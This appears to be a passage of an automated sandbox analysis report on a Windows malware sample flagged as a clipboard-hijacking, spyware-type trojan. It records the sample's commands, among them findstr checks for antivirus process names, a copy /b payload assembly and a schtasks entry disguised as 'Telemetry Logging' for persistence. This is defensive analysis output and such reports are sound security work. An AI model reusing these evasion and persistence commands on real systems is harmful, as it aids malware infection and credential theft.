                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC65C1011_2_6CC65C10
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC72C1011_2_6CC72C10
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC60DD011_2_6CC60DD0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC3FD0011_2_6CC3FD00
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC4ED1011_2_6CC4ED10
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC2BEF011_2_6CC2BEF0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC3FEF011_2_6CC3FEF0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC45E9011_2_6CC45E90
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC84EA011_2_6CC84EA0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC72E4E11_2_6CC72E4E
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC49E5011_2_6CC49E50
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC63E5011_2_6CC63E50
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC96E6311_2_6CC96E63
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC67E1011_2_6CC67E10
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC89E3011_2_6CC89E30
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC2DFE011_2_6CC2DFE0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC56FF011_2_6CC56FF0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC39F0011_2_6CC39F00
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC658E011_2_6CC658E0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC4885011_2_6CC48850
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC4D85011_2_6CC4D850
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC3781011_2_6CC37810
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC6B82011_2_6CC6B820
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC7482011_2_6CC74820
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC8299011_2_6CC82990
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC2C9A011_2_6CC2C9A0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC5D9B011_2_6CC5D9B0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC4A94011_2_6CC4A940
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC3D96011_2_6CC3D960
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC7B97011_2_6CC7B970
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC68AC011_2_6CC68AC0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC41AF011_2_6CC41AF0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC9BA9011_2_6CC9BA90
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC54AA011_2_6CC54AA0
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\KFCFBFHIEB.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: String function: 00BD1A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: String function: 00BE0D17 appears 70 times
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: String function: 00BE8B30 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: String function: 6CC5CBE8 appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: String function: 6CC694D0 appears 35 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062A3 appears 57 times
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                    Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                    Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                    Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                    Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                    Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                    Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                    Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@34/39@3/2
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2A6AD GetLastError,FormatMessageW,11_2_00C2A6AD
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C18DE9 AdjustTokenPrivileges,CloseHandle,11_2_00C18DE9
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C19399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00C19399
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C24148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00C24148
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00C2443D
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\GECOJ0Y6.htmJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeMutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsx35BB.tmpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: Pct.pif, Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: Pct.pif, 0000000B.00000003.3651095372.000000001D771000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000003.3665238064.000000001D765000.00000004.00000800.00020000.00000000.sdmp, JJKFBFIJJECGCAAAFCBG.11.dr, HCFBAFIDAECAKFHJDBAF.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 627982
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "VoipBiographiesScholarPorno" Dis
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates K
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Pct.pif K
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\KFCFBFHIEB.exe "C:\ProgramData\KFCFBFHIEB.exe"
                    Source: C:\ProgramData\KFCFBFHIEB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.batJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 627982Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "VoipBiographiesScholarPorno" Dis Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates KJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Pct.pif KJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\KFCFBFHIEB.exe "C:\ProgramData\KFCFBFHIEB.exe" Jump to behavior
                    Source: C:\ProgramData\KFCFBFHIEB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
